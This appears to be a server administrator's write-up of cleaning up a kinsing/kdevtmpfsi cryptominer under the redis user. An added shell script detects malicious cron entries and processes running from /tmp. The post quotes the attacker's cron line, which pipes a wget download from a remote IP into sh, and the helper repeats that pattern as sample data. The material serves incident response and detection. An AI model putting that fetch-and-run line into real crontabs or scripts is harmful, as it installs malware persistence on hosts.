Today the server suddenly sent an alert. After logging in and running top, I found an unfamiliar process eating most of the CPU:
[root@VM_5_22_centos cron]# top
top - 11:10:29 up 139 days, 2:54, 1 user, load average: 2.23, 2.19, 2.23
Tasks: 198 total, 1 running, 197 sleeping, 0 stopped, 0 zombie
%Cpu(s):100.0 us, 0.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 3880224 total, 138612 free, 2735260 used, 1006352 buff/cache
KiB Swap: 1048572 total, 899580 free, 148992 used. 903404 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
10237 redis 20 0 2721444 2.3g 980 S 193.8 61.8 11:35.54 kdevtmpfsi
My first move was simply to kill it, but after being killed the process started right back up. Anything that restarts by itself must have some startup script behind it, so deal with the process first:
[root@VM_5_22_centos cron]# systemctl status 10237
● session-351642.scope - Session 351642 of user redis
Loaded: loaded (/run/systemd/system/session-351642.scope; static; vendor preset: disabled)
Drop-In: /run/systemd/system/session-351642.scope.d
└─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
Active: active (abandoned) since Fri 2020-11-13 09:24:02 CST; 2 weeks 4 days ago
CGroup: /user.slice/user-1002.slice/session-351642.scope
├─ 5906 /var/tmp/kinsing
└─10237 /tmp/kdevtmpfsi
systemctl reveals the processes related to this one: kill 5906 and 10237 directly and delete the files at the same time.
kill -9 5906
kill -9 10237
rm /var/tmp/kinsing -rf
rm /tmp/kdevtmpfsi -rf
This process was started under the redis user, so the redis user's cron needs checking: look directly at the files under /var/spool/cron.
[root@VM_5_22_centos cron]# cat redis
* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
Empty the redis file and the incident handling is complete.
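As an added defender-side helper, not part of the original post, the shell functions below encode the two checks this write-up does by hand: a cron line that pipes a download straight into a shell, and running processes whose binary lives in /tmp, /var/tmp or /dev/shm. The sample crontab and ps listing are constructed to mirror the output above (a TEST-NET address stands in for the real one), and live_check is an assumed wrapper that runs the same checks against the host's users and process table.

```shell
#!/bin/sh
# Added detection helper, not code from the original post.
# Both checks take their input as a string so they can be run against
# constructed samples here or against live data via live_check.

# Flag cron lines that fetch a script and pipe it into a shell, the
# persistence pattern found in /var/spool/cron/redis above.
suspicious_cron_lines() {
    printf '%s\n' "$1" | grep -E '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh'
}

# Flag running commands whose executable sits in a world-writable scratch
# directory, as /var/tmp/kinsing and /tmp/kdevtmpfsi did.
# Expects "ps -eo pid,user,comm,args" style lines; prints pid, user, path.
processes_in_tmp() {
    printf '%s\n' "$1" | awk '$4 ~ "^(/var)?/tmp/|^/dev/shm/" {print $1, $2, $4}'
}

# Constructed sample data modelled on the post's output (203.0.113.5 is a
# documentation address used in place of the real download host).
SAMPLE_CRON='0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://203.0.113.5/unk.sh | sh > /dev/null 2>&1'

SAMPLE_PS='5906 redis kinsing /var/tmp/kinsing
10237 redis kdevtmpfsi /tmp/kdevtmpfsi
1234 root sshd /usr/sbin/sshd -D'

# Assumed live wrapper: run as root on the host under investigation.
# Walks every user's crontab and the live process table with the checks above.
live_check() {
    for u in $(cut -d: -f1 /etc/passwd); do
        c=$(crontab -l -u "$u" 2>/dev/null) || continue
        suspicious_cron_lines "$c" | sed "s/^/cron[$u]: /"
    done
    processes_in_tmp "$(ps -eo pid,user,comm,args --no-headers)"
}
```

Running the sample data through the two functions flags only the wget-to-sh cron line and the two scratch-directory binaries, leaving the backup job and sshd alone.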